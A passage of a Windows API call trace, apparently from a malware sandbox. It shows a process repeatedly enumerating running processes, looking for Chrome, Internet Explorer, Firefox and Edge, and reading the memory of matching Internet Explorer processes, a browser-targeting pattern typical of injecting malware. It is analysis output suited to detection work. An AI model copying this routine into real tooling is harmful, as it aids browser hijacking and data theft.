	[0210.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.994] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.994] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0210.994] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.994] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.994] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0210.995] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x393c
	[0210.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.995] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0210.995] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.995] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.996] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0210.996] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.996] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.996] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0210.997] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x3940
	[0210.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.997] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0210.997] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.997] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.998] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0210.998] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.998] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.998] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0210.999] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x3944
	[0210.999] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.999] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0211.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.000] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.000] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.000] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0211.001] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.001] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.001] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0211.002] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x3948
	[0211.002] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.002] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0211.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.003] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.003] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.003] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0211.004] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.004] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.004] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0211.005] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x394c
	[0211.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.005] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0211.005] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.005] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.006] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.006] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0211.007] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.007] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.008] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0211.008] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x3950
	[0211.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.009] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0211.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.009] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.009] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.010] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0211.010] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.010] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.010] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0211.011] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x3954
	[0211.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.011] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0211.011] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.011] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0211.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.012] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0211.012] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.012] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.012] NtQueryInformationProcess (in: ProcessHandle=0x3954, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0211.012] ReadProcessMemory (in: hProcess=0x3954, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0211.012] ReadProcessMemory (in: hProcess=0x3954, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0211.012] ReadProcessMemory (in: hProcess=0x3954, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0211.013] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0211.013] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0211.013] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x3958
	[0211.013] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.014] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0211.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.014] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0211.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.014] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0211.014] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.014] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.015] NtQueryInformationProcess (in: ProcessHandle=0x3958, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0211.015] ReadProcessMemory (in: hProcess=0x3958, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0211.015] ReadProcessMemory (in: hProcess=0x3958, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0211.015] ReadProcessMemory (in: hProcess=0x3958, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0211.015] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0211.015] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0211.016] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x395c
	[0211.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.016] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0211.016] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.017] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.017] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0211.017] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.017] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.017] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0211.018] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x3960
	[0211.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.018] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0211.018] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.018] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.019] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0211.019] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.019] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.019] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.025] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x3964
	[0211.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.025] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.025] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.025] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.026] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.026] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.026] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.026] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.027] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.028] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x3968
	[0211.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.028] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.028] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.028] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.028] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.029] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.029] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.029] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0211.029] CloseHandle (hObject=0x188) returned 1
	[0211.029] Sleep (dwMilliseconds=0x64) 
	[0211.131] GetCurrentProcessId () returned 0x110
	[0211.131] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0211.135] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0211.136] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0211.137] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0211.138] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x396c
	[0211.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.138] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.139] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.139] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.139] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.140] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0211.141] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x3970
	[0211.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.141] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.141] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.142] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.142] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.142] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0211.143] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x3974
	[0211.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.144] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0211.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.144] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.145] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0211.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.145] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.145] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0211.147] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x3978
	[0211.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.147] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0211.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.147] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.148] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0211.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.148] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.148] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0211.149] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x397c
	[0211.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.149] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0211.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.150] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.151] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0211.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.151] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.151] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0211.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x3980
	[0211.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.153] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0211.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.153] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.154] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0211.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.154] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.154] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0211.155] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3984
	[0211.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.156] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0211.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.156] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.156] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0211.157] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.157] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.157] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0211.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3988
	[0211.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.158] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0211.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.159] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.159] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0211.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.159] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0211.160] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0211.161] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x398c
	[0211.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.161] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0211.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.161] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0211.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.162] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0211.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0211.162] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
